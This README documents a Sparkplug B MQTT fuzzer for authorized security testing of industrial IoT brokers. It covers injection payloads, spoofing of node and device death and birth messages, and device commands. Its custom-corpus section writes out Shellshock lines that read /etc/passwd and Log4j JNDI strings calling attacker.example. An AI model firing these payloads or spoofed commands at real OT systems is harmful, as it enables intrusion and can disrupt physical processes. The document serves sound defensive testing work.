A comprehensive security assessment tool for testing Sparkplug B MQTT protocol implementations. The fuzzer systematically tests all protocol fields across all 9 message types, discovers live devices on the network, and produces detailed logs for analysis.
This tool sends malformed, injection, and protocol-violating MQTT messages to a target broker. Only run it against systems you own or have explicit written authorization to test. Sparkplug B brokers commonly sit in OT/ICS environments where unexpected payloads can disrupt physical processes — assume every target is production-adjacent unless proven otherwise.
If you discover a vulnerability in a Sparkplug B implementation using this tool, please follow coordinated disclosure with the affected vendor. To report a security issue in this tool itself, see SECURITY.md.
- Overview
- Prerequisites
- Installation
- Quick Start
- Usage
- How It Works
- Running the tests
- Output and Log Analysis
- Protocol Coverage
- Architecture
The Sparkplug B specification defines a topic namespace and payload format built on MQTT and Google Protocol Buffers for Industrial IoT (IIoT) environments. This fuzzer assesses the security and robustness of Sparkplug B implementations by:
- Testing all 19 metric data types with boundary values and overflow conditions
- Injecting malicious strings (XSS, SQLi, format strings, path traversal, command injection)
- Creating type mismatches between declared datatypes and actual protobuf value fields
- Violating protocol state machine ordering (data before birth, double births, data after death)
- Corrupting serialized protobuf payloads at the binary level
- Spoofing birth/death certificates for discovered network devices
- Fuzzing MQTT topic namespaces with special characters, case variations, and structural violations
- Python 3.8+
- MQTT Broker — the target system under test (e.g., Mosquitto, HiveMQ, EMQX, or any Sparkplug B aware broker)
- Authorization — this tool is intended for authorized security testing only
On modern Debian/Ubuntu/Kali (PEP-668 systems), --setup cannot pip install into the system Python — use a virtual environment or pipx first. The recommended path:
python3 -m venv .venv
source .venv/bin/activate
python3 sparkplug-fuzzer.py --setupOr run via pipx run if you prefer not to manage the venv yourself. On older systems without PEP-668 enforcement, plain python3 sparkplug-fuzzer.py --setup works directly.
--setup will:
- Install pip dependencies (
paho-mqtt,protobuf) - Clone a pinned tag of the Eclipse Tahu repository (see
TAHU_REFin the script) - Copy
sparkplug_b.pyandarray_packer.pyhelper modules - Compile
sparkplug_b.protointo Python bindings (usesprotocif available, falls back togrpcio-tools) - Clean up the Tahu clone
After setup, your directory should contain:
sparkplug-fuzzer.py # The fuzzer
sparkplug_b.py # Sparkplug B helper module (from Tahu)
array_packer.py # Array packing helper (from Tahu)
sparkplug_b_pb2.py # Generated protobuf bindings
requirements.txt # Python dependencies
Manual setup (if --setup doesn't work)
pip install -r requirements.txt
git clone https://github.com/eclipse/tahu.git
cp tahu/python/core/sparkplug_b.py .
cp tahu/python/core/array_packer.py .
protoc --python_out=. sparkplug_b.proto
rm -rf tahupython3 sparkplug-fuzzer.py --setup # first-time setup
python3 sparkplug-fuzzer.py -H localhost -p 1883 -v # run fuzzerThis will:
- Connect to the broker at
localhost:1883 - Listen for 10 seconds to discover existing Sparkplug devices
- Establish the fuzzer as a Sparkplug node/device
- Run all 12 fuzz categories (~635+ test cases)
- Target any discovered devices with spoofed messages
- Write results to
sparkplug_fuzz.jsonl
python3 sparkplug-fuzzer.py [OPTIONS]
| Option | Default | Description |
|---|---|---|
-H, --host |
localhost |
MQTT broker hostname or IP |
-p, --port |
1883 (or 8883 with --tls) |
MQTT broker port |
-u, --username |
None | MQTT username (also reads MQTT_USERNAME env var) |
-P, --password |
None | MQTT password (also reads MQTT_PASSWORD; pass - to read from stdin without echo) |
--tls |
off | Connect over TLS; default port becomes 8883 if -p unset |
--cafile |
None | CA bundle for TLS server certificate verification |
--insecure |
off | Skip TLS hostname/certificate verification (testing only) |
-g, --group |
Sparkplug B Devices |
Sparkplug group ID the fuzzer registers under |
-n, --node |
FuzzNode |
Sparkplug edge node ID for the fuzzer |
-d, --device |
FuzzDevice |
Sparkplug device ID for the fuzzer |
-c, --categories |
all |
Space-separated list of fuzz categories to run |
--discovery-time |
10 |
Seconds to passively listen for network discovery |
--delay |
0.1 |
Delay in seconds between fuzz messages |
--probe-anon-write |
off | During discovery, send one QoS=1 publish to confirm whether the broker accepts unauthenticated PUBLISH |
-l, --log |
sparkplug_fuzz.jsonl |
Output log file name (relative paths land inside --output-dir; absolute paths are honored as-is) |
--output-dir |
./sparkplug-runs/<UTC-ts>_<host>/ |
Per-run output directory. Created if absent. |
-v, --verbose |
0 | Increase console verbosity (-v = info, -vv = debug). -vv also surfaces fuzz-generator skips, and the throttled paho.mqtt logger bumps to INFO/DEBUG with verbosity. |
--setup |
— | Install all dependencies and exit |
--tahu-path |
— | Path to a local clone of eclipse/tahu (or its python/core directory). Used by --setup in air-gapped environments instead of git clone. |
--extra-string-payloads |
— | Path to a file of additional string-injection payloads (one per line, UTF-8). Appended to the built-in STRING_FUZZ_VALUES; does not replace them. Max 10 MB / 10,000 payloads. See Custom string corpora. |
| Category | Description | Approx. Cases |
|---|---|---|
boundary |
Min/max/overflow for all 19 numeric data types, is_null with values, flag combinations | ~200 |
string |
Injection payloads (XSS, SQLi, format strings, path traversal, command injection, null bytes) across String, Text, UUID, MetaData fields, and STATE messages | ~100 |
type_mismatch |
Declared datatype vs wrong protobuf value field, invalid datatype codes, multiple oneof fields | ~150 |
sequence |
Sequence gaps, duplicates, backwards, rollover, bdSeq mismatch between NBIRTH/NDEATH | ~20 |
timestamp |
Zero, max uint64, far future/past, metric vs payload timestamp inconsistency, DateTime extremes | ~15 |
alias |
Duplicate aliases for different metrics, extreme alias values, undefined aliases in data messages | ~15 |
orphan |
Data/commands targeting non-existent devices, nodes, groups; undefined template references | ~20 |
ordering |
Protocol state violations: data before birth, double births, data after death, wrong birth order | ~15 |
recursive |
Nested PropertySet chains (depth 1-100), key/value length mismatches, PropertySetList variations | ~15 |
dataset |
Column count mismatches, row element mismatches, type violations, empty/huge datasets, special chars in column names | ~25 |
malformed |
Binary protobuf corruption: truncation, bit flips, random bytes, overlong varints, wrong message classes | ~30 |
topic |
Case variations, wrong versions, extra/missing slashes, special characters, wildcards in topic strings | ~30 |
Run all categories with authentication:
python3 sparkplug-fuzzer.py -H 10.0.1.30 -p 1883 -u admin -P secret -vPass credentials without exposing them in ps:
# Via environment
MQTT_USERNAME=admin MQTT_PASSWORD=secret python3 sparkplug-fuzzer.py -H broker.local
# Or read password from stdin (getpass — no echo)
python3 sparkplug-fuzzer.py -H broker.local -u admin -P -Connect over TLS:
# System trust store, default port 8883
python3 sparkplug-fuzzer.py -H broker.example.com --tls -v
# Custom CA bundle
python3 sparkplug-fuzzer.py -H broker.example.com --tls --cafile ./ca.pem -vPassive auth assessment + active write probe:
python3 sparkplug-fuzzer.py -H 10.0.1.30 --probe-anon-write -vRun only injection-related categories:
python3 sparkplug-fuzzer.py -H broker.local -c string type_mismatch malformedExtended discovery with slow pacing (minimize broker load):
python3 sparkplug-fuzzer.py -H 192.168.1.100 --discovery-time 60 --delay 0.5Custom group/node identity and log file:
python3 sparkplug-fuzzer.py -H broker.local \
-g "Production Floor" -n "TestNode01" -d "TestDevice01" \
-l production_fuzz_results.jsonl -vvMonitor broker traffic in a separate terminal:
mosquitto_sub -h <broker_host> -p 1883 -t 'spBv1.0/#' -F '%I %t %x'Air-gapped setup with a pre-cloned Tahu repo:
git clone https://github.com/eclipse/tahu.git ~/tahu # on a connected box
# transfer ~/tahu to the air-gapped target, then on the target:
python3 sparkplug-fuzzer.py --setup --tahu-path ~/tahuPer-run output layout:
# Default — directory is auto-named under ./sparkplug-runs/
python3 sparkplug-fuzzer.py -H broker.local
# -> creates ./sparkplug-runs/2026-05-05_1830_broker.local/sparkplug_fuzz.jsonl
# Explicit directory:
python3 sparkplug-fuzzer.py -H broker.local --output-dir ./fuzz-runs/acme-2026Q2The built-in STRING_FUZZ_VALUES covers the classic injection categories (empty / huge strings, null bytes, format strings, XSS, SQLi, path traversal, prototype pollution). Real engagements often need second-order payloads aimed at whatever consumes the broker's data downstream — historians piping metric names through shell, Java-based SCADA hosts feeding values into log4j, dashboards rendering tag names in HTML, etc.
The --extra-string-payloads <FILE> flag appends an additional corpus to the built-ins. Format is one payload per line, UTF-8. Whitespace-only lines are kept (often intentional in fuzz); fully blank lines are dropped. The flag adds to the built-in list rather than replacing it, so existing coverage is preserved.
# corpus.txt — Shellshock + Log4j JNDI prefixes
cat > corpus.txt <<'EOF'
() { :;}; /bin/cat /etc/passwd
() { :; }; echo VULN
${jndi:ldap://attacker.example/x}
${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/x}
${${lower:jndi}:ldap://attacker.example/x}
EOF
python3 sparkplug-fuzzer.py -H broker.local --extra-string-payloads corpus.txt -vThe fuzzer prints [+] Extra string payloads: loaded N from <path> at startup, and each payload is emitted through every place that iterates STRING_FUZZ_VALUES — primarily the string category, but also the type-mismatch generator's string-typed cases.
Hard limits: 10 MB file size, 10,000 payloads. Adjust MAX_EXTRA_PAYLOADS_FILE_SIZE / MAX_EXTRA_PAYLOADS_COUNT at the top of the script if you need more (and have the run-time budget to match).
--output-dirflag plus auto-created./sparkplug-runs/<UTC-ts>_<host>/default — every run lands in its own directory so artifacts don't collide between runs.--tahu-pathflag for--setup— points at a local clone ofeclipse/tahufor air-gapped test environments where outboundgit cloneis blocked. The local source is never deleted on cleanup.- Console + JSONL timestamps forced to UTC with explicit
Zsuffix so cross-correlation with broker logs is timezone-arithmetic-free. paho.mqttlogger throttled to WARNING by default; visible at INFO under-v, DEBUG under-vv. Per-packet client telemetry no longer drowns out fuzz signal.- pytest test harness under
tests/— 23 tests covering FuzzLogger, topic helper, output path resolution, and--tahu-pathvalidation. See Running the tests.
The test harness covers the network-independent surface (logger correctness, topic builder, output-path resolution, --tahu-path parsing) and runs without a broker, paho-mqtt, or protobuf installed.
pip install -r requirements-dev.txt
pytest tests/Expected: 23 passed. Network-dependent paths (PayloadBuilder protobuf, fuzz publishers, MQTT lifecycle) are deliberately deferred to a future integration-test layer with a containerized broker.
1. CONNECT Connect to MQTT broker with NDEATH as last-will-and-testament
Subscribe to spBv1.0/# and STATE/# for discovery
|
2. DISCOVER Passively listen for Sparkplug traffic (configurable duration)
Build map of groups, nodes, devices, and their metric definitions
|
3. ESTABLISH Publish fuzzer's own NBIRTH + DBIRTH to register as a valid node
|
4. FUZZ Run selected categories sequentially
Each category generator yields (topic, payload, description) tuples
Every publish logged via centralized _publish() method
Configurable delay between messages
|
5. TARGET For each discovered node/device:
- Spoof NDEATH (kill node)
- Spoof NBIRTH (impersonate node)
- Spoof DDEATH/DBIRTH (kill/impersonate device)
- Send DCMD/NCMD with fuzzed metric values
|
6. REPORT Print summary (total TX/RX counts by category)
Close log file, disconnect
During the discovery phase, the fuzzer subscribes to spBv1.0/# and listens for all Sparkplug traffic. The DeviceTracker component parses observed messages to build a live network map:
- NBIRTH messages reveal edge nodes and their metric definitions (name, alias, datatype)
- DBIRTH messages reveal devices and their metric schemas
- NDEATH/DDEATH messages track node/device lifecycle state
- STATE messages reveal host applications and their online/offline status
This map is used in the targeted fuzzing phase to send contextually relevant attacks against real devices with their actual metric schemas.
When the fuzzer connects without -u/-P (and MQTT_USERNAME/MQTT_PASSWORD aren't set), it derives a broker auth posture from passive discovery alone. This produces a single AUTH_ASSESSMENT event in the log and a printed summary:
| Signal | What it means | How it's derived |
|---|---|---|
anon_connect_accepted |
Broker accepted CONNECT without credentials | The fuzzer's own CONNECT succeeded |
anon_subscribe_accepted |
Broker forwards spBv1.0/# / STATE/# to anonymous clients |
At least one RX message arrived during the listen window |
anon_publish_accepted |
Broker accepts PUBLISH from anonymous clients | Set only if --probe-anon-write is passed; QoS=1 probe + PUBACK wait |
unauth_endpoints |
Nodes / devices / host applications observable without auth | Every entity in the discovered network map (auth was never produced) |
The QoS=1 probe is opt-in because it crosses from passive into active. With QoS=0 the broker silently drops messages it would deny, so confirming write-accept requires reading a PUBACK.
MQTT/Sparkplug have no per-endpoint auth — auth is a broker-level concern. So "endpoints observable without authentication" is reported as a list of targets reachable at zero cost rather than as a property of the endpoints themselves.
After systematic fuzzing, the tool targets each discovered device with:
- Spoofed death notices — publishes NDEATH/DDEATH to trick subscribers into thinking devices went offline
- Spoofed birth certificates — publishes NBIRTH/DBIRTH to impersonate discovered nodes/devices
- Command injection — sends NCMD/DCMD messages with boundary values for each known metric, testing whether the target validates inbound commands
- Rebirth commands — sends
Node Control/RebirthNCMD to trigger devices to republish their births
The log file uses JSON-lines format (.jsonl) — one JSON object per line, suitable for analysis with jq, Python, or any JSON-capable tool.
Payloads larger than 64 KiB are not hex-inlined; instead payload_hex carries sha256:<digest>+len=<n> so the log stays bounded for very large fuzz cases. payload_len is always present.
TX record (outbound fuzz message):
{
"ts": "2026-04-10T15:30:00.123456Z",
"dir": "TX",
"case_id": "BOUNDARY-0042",
"category": "boundary",
"topic": "spBv1.0/Sparkplug B Devices/DDATA/FuzzNode/FuzzDevice",
"payload_hex": "0800120a0a06...",
"payload_len": 28,
"payload_decoded": {"timestamp": 1712345678000, "metrics": [{"name": "fuzz/boundary/Int32", "datatype": 3, "int_value": 2147483647}]},
"description": "Boundary Int32 = 2147483647 (int_value)"
}RX record (inbound message from network):
{
"ts": "2026-04-10T15:30:01.456789Z",
"dir": "RX",
"topic": "spBv1.0/Production/NBIRTH/PLC01",
"payload_hex": "0800120f...",
"payload_len": 156,
"payload_decoded": {"timestamp": 1712345679000, "metrics": [{"name": "Node Control/Rebirth", "datatype": 11, "boolean_value": false}]}
}Event record (system event):
{
"ts": "2026-04-10T15:29:50.000000Z",
"dir": "EVENT",
"event": "DISCOVERY_COMPLETE",
"details": {"groups": ["Production"], "node_count": 3, "device_count": 7, "targets": 10}
}Count cases by category:
grep '"dir": "TX"' sparkplug_fuzz.jsonl | jq -r '.category' | sort | uniq -c | sort -rnExtract all string injection cases:
jq 'select(.category == "string")' sparkplug_fuzz.jsonlList all discovered devices:
jq 'select(.event == "DISCOVERY_COMPLETE")' sparkplug_fuzz.jsonlFind cases that triggered broker disconnects:
jq 'select(.event == "UNEXPECTED_DISCONNECT" or .event == "RECONNECT_FAIL")' sparkplug_fuzz.jsonlPull the authentication assessment:
jq 'select(.event == "AUTH_ASSESSMENT")' sparkplug_fuzz.jsonlList endpoints reachable without authentication:
jq -r 'select(.event == "AUTH_ASSESSMENT") | .details.unauth_endpoints[] | [.kind, .group, .node, .device, .host_id, .status] | @tsv' sparkplug_fuzz.jsonlGet TX count over time (for rate analysis):
grep '"dir": "TX"' sparkplug_fuzz.jsonl | jq -r '.ts[:19]' | uniq -cExport all topics that were published to:
jq -r 'select(.dir == "TX") | .topic' sparkplug_fuzz.jsonl | sort -uAnalyze with Python:
import json
with open("sparkplug_fuzz.jsonl") as f:
records = [json.loads(line) for line in f]
tx = [r for r in records if r["dir"] == "TX"]
rx = [r for r in records if r["dir"] == "RX"]
events = [r for r in records if r["dir"] == "EVENT"]
print(f"Total TX: {len(tx)}, RX: {len(rx)}, Events: {len(events)}")
# Find any decode errors in received messages (possible crash indicators)
errors = [r for r in rx if "_decode_error" in str(r.get("payload_decoded", {}))]
print(f"Decode errors in RX: {len(errors)}")All 9 Sparkplug B message types are tested:
| Message Type | Topic Pattern | Description | Fuzzer Usage |
|---|---|---|---|
| NBIRTH | spBv1.0/{group}/NBIRTH/{node} |
Node birth certificate | Establishes fuzzer presence; spoofed for discovered nodes; ordering tests |
| NDEATH | spBv1.0/{group}/NDEATH/{node} |
Node death notification | MQTT last-will; spoofed for discovered nodes; ordering tests |
| DBIRTH | spBv1.0/{group}/DBIRTH/{node}/{device} |
Device birth certificate | Establishes fuzzer device; spoofed for discovered devices; ordering tests |
| DDEATH | spBv1.0/{group}/DDEATH/{node}/{device} |
Device death notification | Spoofed for discovered devices; ordering tests; orphan tests |
| NDATA | spBv1.0/{group}/NDATA/{node} |
Node data update | Boundary values; sequence numbers; ordering tests |
| DDATA | spBv1.0/{group}/DDATA/{node}/{device} |
Device data update | Primary vehicle for most fuzz categories |
| NCMD | spBv1.0/{group}/NCMD/{node} |
Node command | Targeted fuzzing (rebirth commands); orphan tests |
| DCMD | spBv1.0/{group}/DCMD/{node}/{device} |
Device command | Targeted fuzzing against discovered device metrics; orphan tests |
| STATE | STATE/{host_id} |
Host application state (JSON) | Malformed JSON injection |
All 19 Sparkplug B metric data types are tested with type-specific boundary values:
| Code | Type | Protobuf Field | Boundary Values Tested |
|---|---|---|---|
| 1 | Int8 | int_value | 0, -128, 127, 128 (overflow), -129 (underflow) |
| 2 | Int16 | int_value | 0, -32768, 32767, overflow/underflow |
| 3 | Int32 | int_value | 0, -2^31, 2^31-1, overflow/underflow |
| 4 | Int64 | long_value | 0, -2^63, 2^63-1, overflow |
| 5 | UInt8 | int_value | 0, 255, 256, -1 |
| 6 | UInt16 | int_value | 0, 65535, 65536, -1 |
| 7 | UInt32 | int_value | 0, 4294967295, -1 |
| 8 | UInt64 | long_value | 0, 2^64-1, -1 |
| 9 | Float | float_value | 0.0, -0.0, max, min, inf, -inf, NaN |
| 10 | Double | double_value | 0.0, -0.0, max, min, inf, -inf, NaN |
| 11 | Boolean | boolean_value | True, False; also tested with raw int values (0, 1, 2, 255) |
| 12 | String | string_value | Empty, long (up to 64KB), injection payloads |
| 13 | DateTime | long_value | Epoch, max, far future/past |
| 14 | Text | string_value | Same injection payloads as String |
| 15 | UUID | string_value | Empty, valid, invalid format, injections |
| 16 | DataSet | dataset_value | Structural violations via dataset category |
| 17 | Bytes | bytes_value | Empty, null bytes, random, large |
| 18 | File | bytes_value | Empty, magic bytes, large |
| 19 | Template | template_value | Undefined references, orphan templates |
The fuzzer covers 87+ unique protobuf field paths including:
- Payload root fields: timestamp, seq, uuid, body, metrics
- Metric fields: name, alias, timestamp, datatype, is_historical, is_transient, is_null, metadata, properties, and all value oneof variants
- MetaData fields: is_multi_part, content_type, size, seq, file_name, file_type, md5, description
- PropertySet/PropertyValue: keys, values, type, is_null, recursive propertyset_value, propertysets_value
- DataSet: num_of_columns, columns, types, rows, elements, all DataSetValue variants
- Template: version, template_ref, is_definition, nested metrics, parameters
The fuzzer is a single Python file organized into these components:
sparkplug-fuzzer.py
|
+-- Constants / ALL_METRIC_TYPES / STRING_FUZZ_VALUES
| Type definitions and fuzz value tables
|
+-- FuzzLogger
| JSON-lines file logging + console output
| Protobuf payload decoding
|
+-- DeviceTracker
| Passive network discovery
| Tracks groups, nodes, devices, metrics
|
+-- PayloadBuilder
| Valid payload construction (sparkplug_b helpers)
| Raw payload construction (sparkplug_b_pb2 direct)
| Binary corruption (truncate, flip, append)
|
+-- 12 Fuzz Generators
| Each is a Python generator yielding (topic, bytes, desc)
| Covers boundary, string, type, seq, timestamp, alias,
| orphan, ordering, recursive, dataset, malformed, topic
|
+-- SparkplugFuzzer
| Orchestration: connect, discover, fuzz, target, report
| Centralized publish with logging
| Auto-reconnect on disconnect
|
+-- CLI (argparse) + main()
Argument parsing and entry point
The two-level payload construction is a key design decision:
- High-level (
PayloadBuilder.node_birth(), etc.) usessparkplug_bhelper functions to build valid, well-formed payloads. Used for establishing presence and targeted spoofing. - Low-level (
PayloadBuilder.raw_payload(),corrupt_bytes()) directly manipulatessparkplug_b_pb2protobuf objects or raw bytes, bypassing validation. Used for intentionally malformed payloads that test parser error handling and edge cases.
This project is licensed under the MIT License — see LICENSE for the full text.
sparkplug-fuzzer.py --setup fetches the following components from Eclipse Tahu at install time and copies them into the working directory:
sparkplug_b.py— Sparkplug B helper modulearray_packer.py— Array packing helpersparkplug_b.proto— Protocol Buffer definition (used to generatesparkplug_b_pb2.py)
Eclipse Tahu is distributed under the Apache License, Version 2.0. None of the Tahu source files are redistributed in this repository. See NOTICE for the full attribution.